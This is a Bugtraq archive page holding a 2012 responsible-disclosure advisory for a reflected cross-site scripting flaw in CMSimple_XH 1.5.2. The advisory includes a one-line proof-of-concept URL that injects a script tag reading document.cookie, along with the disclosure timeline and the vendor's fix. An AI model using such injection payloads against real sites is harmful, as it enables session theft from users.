[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CMSimple_XH 1.5.2 Cross-site Scripting vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CMSimple_XH 1.5.2 Cross-site Scripting vulnerability
From: sschurtz@xxxxxxxxxxxxxxx
Date: Wed, 21 Mar 2012 11:19:00 GMT

Advisory:               CMSimple_XH 1.5.2 Cross-site Scripting vulnerability
Advisory ID:            SSCHADV2012-008
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on CMSimple_XH 1.5.2
Vendor URL:             http://www.cmsimple-xh.de
Vendor Status:          fixed

==========================
Vulnerability Description
==========================

CMSimple_XH 1.5.2 is prone to Cross-site Scripting vulnerability

==================
PoC-Exploit
==================

http://[target]/cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script>

=========
Solution
=========

Update to the latest version

====================
Disclosure Timeline
====================

15-Mar-2012 - vendor informed
19-Mar-2012 - fixed in version v1.5.3

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.cmsimple-xh.de/?History_und_ChangeLog/19.03.2012_-_v1.5.3
http://www.darksecurity.de/advisories/2012/SSCHADV2012-008.txt

Prev by Date: Multiple vulnerabilities in Open Journal Systems (OJS)
Next by Date: [ MDVSA-2012:033 ] libpng
Previous by thread: Multiple vulnerabilities in Open Journal Systems (OJS)
Next by thread: [ MDVSA-2012:033 ] libpng
Index(es):
- Date
- Thread